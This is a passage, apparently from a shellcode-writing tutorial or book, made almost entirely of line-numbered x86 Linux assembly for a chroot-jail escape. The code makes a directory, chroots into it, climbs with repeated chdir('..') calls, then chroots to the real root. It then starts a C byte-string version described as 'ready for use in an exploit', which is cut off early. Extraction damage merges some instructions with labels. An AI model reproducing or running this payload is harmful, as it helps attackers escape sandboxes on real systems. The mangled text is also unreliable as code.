
10 movw $0x01ed, %cx
11
12
leal 0x27(%edx), %eax
13 int $0x80
14
15
leal 61(%edx), %eax
16 int $0x80
17
18
xorl %esi, %esi
19
20
loop:
21 pushl %edx
22 pushw $0x2e2e
23 movl %esp, %ebx
24
25
leal 12(%edx), %eax
26 int $0x80
27
28
pushl %edx
29 push $0x2e
30 movl %esp, %ebx
31
32
subl $88, %esp
33 movl %esp, %ecx
34
35
leal 106(%edx), %eax
36 int $0x80
37
38
movl 0x4(%ecx), %edi
39 cmpl $0x2, %edi
40 jehacked
41
42
incl %esi
43 cmpl $0x64, %esi
44 jlloop
45
46
hacked:
47 pushl %edx
48 push $0x2e
49 movl %esp, %ebx
50
51
leal 61(%edx), %eax
52 int $0x80
Lastly, converted to bytecode and ready for use in an exploit, the code looks like the
following:
1 const char neo_chroot[] =
2 "\x31\xd2" /* xorl %edx, ...